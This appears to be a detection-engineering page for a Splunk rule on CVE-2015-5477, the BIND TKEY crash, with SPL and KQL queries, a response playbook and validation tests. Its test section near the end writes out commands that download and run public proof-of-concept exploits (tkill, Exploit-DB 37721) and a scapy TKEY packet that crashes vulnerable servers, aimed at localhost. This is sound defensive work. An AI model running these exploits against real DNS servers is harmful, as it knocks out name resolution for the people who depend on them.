Detect ISC BIND named TKEY Query Remote Denial of Service (CVE-2015-5477) in Splunk
Detects exploitation of CVE-2015-5477, a critical data-processing error in ISC BIND's handling of TKEY queries. A remote, unauthenticated attacker can send a specially crafted DNS packet containing a TKEY record that triggers a REQUIRE assertion failure in named (buffer.c / db.c), causing the daemon to exit (INSIST/REQUIRE assertion). Because a single malformed packet crashes named, this is a trivially weaponizable remote DoS against any recursive or authoritative BIND server. Detection focuses on DNS TKEY query records (qtype 249) directed at named, correlated with abnormal named process termination / assertion-failure log lines and service restarts. Listed in CISA KEV.
MITRE ATT&CK
- Tactic
- Impact
SPL Detection Query
(index=dns sourcetype="isc:bind:query" (query_type="TKEY" OR query_type="249" OR record_type="TKEY"))
| bin _time span=5m
| stats count AS tkey_count values(src_ip) AS src_ips by _time, host
| join type=left _time, host
[ search (index=os sourcetype="syslog" process="named" ("REQUIRE" OR "assertion failure" OR "buffer.c" OR "RUNTIME_CHECK" OR "exiting (due to fatal error)"))
| bin _time span=5m
| stats count AS crash_count values(_raw) AS crash_msgs by _time, host ]
| eval suspicious=if(tkey_count>0 AND crash_count>0, "yes", "no")
| where tkey_count>0
| table _time host tkey_count src_ips crash_count crash_msgs suspicious Buckets inbound BIND TKEY queries per 5 minutes and joins to named syslog assertion/fatal-exit events on the same host and window. Co-occurrence indicates CVE-2015-5477 exploitation.
Data Sources
Required Sourcetypes
False Positives & Tuning
- GSS-TSIG dynamic update traffic legitimately using TKEY records.
- Authorized DNS fuzzing/scanning by internal red team or vulnerability management.
- Benign named restarts from config reloads coinciding with sampled TKEY queries.
Other platforms for CVE-2015-5477
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Send malformed TKEY query to named (PoC tkill)
Expected signal: Inbound DNS packet with a TKEY (qtype 249) record to port 53; named log line 'buffer.c:... REQUIRE(...) failed' followed by 'exiting (due to fatal error)'.
- Test 2Craft TKEY query with scapy
Expected signal: DNS query event with query_type=TKEY/249 captured in BIND query log or network DNS sensor.
- Test 3Exploit-DB PoC 37721 TKEY assertion crash
Expected signal: TKEY DNS query to the target; named assertion-failure entry and process termination in system logs.
References (8)
- https://nvd.nist.gov/vuln/detail/CVE-2015-5477
- https://web.archive.org/web/20150729014733/https://kb.isc.org/article/AA-01272
- https://access.redhat.com/errata/RHSA-2015:1513.html
- https://supportportal.juniper.net/s/article/2016-01-Security-Bulletin-Junos-Vulnerability-in-ISC-BIND-named-CVE-2015-5477
- https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk
- https://www.exploit-db.com/exploits/37721
- https://www.exploit-db.com/exploits/37723
- https://github.com/robertdavidgraham/cve-2015-5477/blob/34137c71a7fb4e3fa894b045583e67d7b46d62cc/tkill.c
Response Playbook
Triage
- Confirm whether the affected host runs ISC BIND (named) and verify its version against the ISC advisory AA-01272; BIND 9.1.0 through 9.9.7-P1 and 9.10.x before 9.10.2-P2 are vulnerable.
- Review named logs (/var/log/messages, journalctl -u named) for 'REQUIRE', 'assertion failure', 'buffer.c', or 'exiting (due to fatal error)' entries and correlate their timestamps with inbound TKEY (qtype 249) queries.
- Identify the source IP(s) of the TKEY queries from DNS query logs or packet capture and determine whether they are internal (possible GSS-TSIG) or external/untrusted.
- Determine whether named terminated and whether a supervisor (systemd/monit) auto-restarted it, indicating a crash-loop DoS pattern.
Containment
- Apply the ISC patch / upgrade named to a fixed release (9.9.7-P2, 9.10.2-P3, or later) on all affected servers.
- As an interim mitigation, block or rate-limit inbound DNS packets containing TKEY records at the perimeter firewall/IPS and restrict recursion to trusted clients.
- If a crash-loop is active, place the resolver behind a redundant/failover DNS service to maintain availability while patching.
Evidence Collection
- Capture the raw malicious packet(s) via tcpdump (e.g. 'tcpdump -i any -w tkey.pcap port 53') for the offending source IP and preserve the pcap.
- Collect named logs, the core dump (if coredumps enabled), and systemd/service restart timestamps for the incident window.
Escalation Criteria
- !TKEY-triggered named crashes observed from untrusted/external source IPs, confirming active exploitation of CVE-2015-5477.
- !Repeated crash-restart cycles causing sustained DNS outage, or exploitation targeting internet-facing authoritative/recursive servers.
Investigation Guide
Related Techniques
Forensic Artifacts
- >
named syslog/journal entries containing 'REQUIRE ... failed' / 'assertion failure' referencing buffer.c or db.c. - >
Packet capture of the inbound DNS query bearing a TKEY (type 249) record. - >
named process exit codes and systemd restart records in journalctl.
Tuning Guidance
In Active Directory / Kerberos environments, TKEY is used legitimately for GSS-TSIG secure dynamic updates, so alert only when TKEY queries coincide with named assertion failures/crashes or originate from untrusted source IPs. Allow-list known DDNS update clients and internal domain controllers. Once all named instances are confirmed patched to a fixed release, downgrade severity to informational and retain the hunting query for regression monitoring.
Hunting Queries
Surfaces all hosts receiving TKEY (qtype 249) DNS queries and the source IPs sending them over the past week to baseline legitimate GSS-TSIG use versus anomalous probes.
DnsEvents | where TimeGenerated > ago(7d) | where QueryType =~ "TKEY" or QueryType == "249" | summarize count() by ClientIP, Computer, bin(TimeGenerated, 1h) | sort by count_ desc index=dns sourcetype="isc:bind:query" (query_type="TKEY" OR query_type="249") | stats count by src_ip, host | sort - count Atomic Red Team Tests
Uses the public CVE-2015-5477 proof-of-concept to send a crafted TKEY DNS query that triggers a REQUIRE assertion failure in a vulnerable BIND named instance. LAB ONLY against an authorized vulnerable server.
Command
git clone https://github.com/robertdavidgraham/cve-2015-5477 /tmp/cve-2015-5477 && cd /tmp/cve-2015-5477 && make && ./tkill 127.0.0.1 53 Cleanup
rm -rf /tmp/cve-2015-5477; systemctl restart named 2>/dev/null || service named restart 2>/dev/null Expected Telemetry
Inbound DNS packet with a TKEY (qtype 249) record to port 53; named log line 'buffer.c:... REQUIRE(...) failed' followed by 'exiting (due to fatal error)'.
Expected Detection
KQL/SPL correlation rule fires on TKEY query co-occurring with named assertion-failure/crash within the 5-minute window.
Constructs and sends a DNS query containing a TKEY record using scapy to generate TKEY telemetry (qtype 249) for detection validation. Against a vulnerable named this crashes the service.
Command
python3 -c "from scapy.all import *; pkt=IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname='attacker.example',qtype=249)); send(pkt)" Cleanup
systemctl restart named 2>/dev/null || service named restart 2>/dev/null Expected Telemetry
DNS query event with query_type=TKEY/249 captured in BIND query log or network DNS sensor.
Expected Detection
Detection rule records the TKEY query; if named terminates, the crash-correlation branch escalates the alert.
Runs the Exploit-DB 37721 proof-of-concept against an authorized lab BIND server to reproduce the CVE-2015-5477 remote DoS and validate crash telemetry.
Command
curl -s https://www.exploit-db.com/raw/37721 -o /tmp/37721.py && python2 /tmp/37721.py 127.0.0.1 Cleanup
rm -f /tmp/37721.py; systemctl restart named 2>/dev/null || service named restart 2>/dev/null Expected Telemetry
TKEY DNS query to the target; named assertion-failure entry and process termination in system logs.
Expected Detection
Correlation detection flags the TKEY-query-plus-named-crash sequence as critical CVE-2015-5477 exploitation.